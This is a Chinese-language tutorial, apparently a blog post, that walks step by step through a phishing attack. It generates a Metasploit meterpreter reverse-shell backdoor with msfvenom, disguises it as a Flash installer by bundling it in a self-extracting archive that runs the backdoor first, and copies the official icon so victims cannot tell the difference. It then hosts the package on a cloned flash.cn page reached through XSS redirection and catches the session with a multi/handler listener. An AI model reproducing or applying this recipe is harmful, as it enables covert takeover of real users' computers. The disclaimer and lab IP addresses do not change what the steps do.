★★免责声明★★
文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与学习之用,读者将信息做其他用途,由Ta承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
1、环境说明&前置条件
环境说明:
kali系统,ip:192.168.242.4 ,攻击机
win7系统,ip: 192.168.242.5 ,靶机或部署服务机器
前置条件:用户访问钓鱼网站,下载安装钓鱼软件。
通过XSS植入代码使用访问目标地址,跳转到Flash钓鱼下载页面,用户下载安装后,电脑就被控制了。
注意:用户如果没下载安装,就无法实现攻击控制。所以,不明来源的软件一定不要下载安装。
2 、kali生成后门
msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。
# IP地址是kali的IP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.4 LPORT=6666 -f exe > flash.exe
制作完先从kali复制到自己本机(关闭杀毒软件,如果是win10的话,安全中心的病毒和威胁防护也先关闭下),再到win7虚拟机。因为不建议直接在自己本机操作以下步骤。
还可利用win7的永恒之蓝漏洞,直接把flash.exe传递过去。详细请参考《渗透测试实战-漏洞利用MS17-010》。
3、下载官方Flash文件
下载官方文件-保证安装正常,官网网站:www.flash.cn
。
适用于旧版 www.flash.cn
的钓鱼页:https://github.com/r00tSe7en/Fake-flash.cn
,页面地址是index.html ,可以代码下载下来放在自己服务器上,然后修改下载地址。
可使用phpstudy创建一个网站,我添加一个网址:flash-test.cn
,访问效果如下:
4、压缩捆绑文件
官方下载文件:flashcenter_pp_ax_install_cn.exe
,自己制作的后门:flash.exe
。
选中两个文件右击创建压缩文件:【注意:以下编辑项基于winRAR软件】
压缩文件格式:-RAR
压缩选项:-创建自解压格式压缩文件(X)
高级:-自解压选项(X)
-常规:-解压路径:C:\windows\temp
-设置:
-解压前运行(B): C:\windows\temp\flash.exe 【后门】
-解压后运行(F): C:\windows\temp\flashcenter_pp_ax_install_cn.exe
点->确定->确定
使用工具:【Restorator 2018】修改图标,使其更逼真
1、把官方的exe拉进去,找到目录Icon下的,会看一个文件,鼠标按不放,拖到指定目录,比如:C:\soft
。
2、再把官方图标拉到新制作的压缩包,把原来的图标删除掉,然后保存。
修改完的跟官方的安装包,从肉眼很难分辨出来。
完成后把压缩包复制到钓鱼网站下,并修改下载地址。
5、MSF配置监听
如果要获取信息,要一直监听着。kali系统输入以下命令
msfconsole
启动成功后-开始输入命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.242.4
set LPORT 6666
run # 执行
当看到这样界面时表示开始监听
6、访问钓鱼网址并下载安装
只要对方下载了钓鱼软件flah_install.exe
,点了安装按钮,后面的真正flash软件有没安装都已经监听了。
7、MSF上线
到kali系统查看,发现已经上线了,可以进行相关操作了。
让用户访问钓鱼URL,这个属于社工类,就不细说了,可配合beef-xss重定向跳转到钓鱼网址。
beef-xss安装和使用请参考《XSS另类攻击(四)kali系统beef-xss安装和使用》。
8、资料获取&我的公众号
如果需要【Restorator 2018】工具,绿色版本无需安装,请关注公众号:大象只为你,后台回复:Restorator。
敬请关注我的公众号:大象只为你,持续更新网安相关知识中…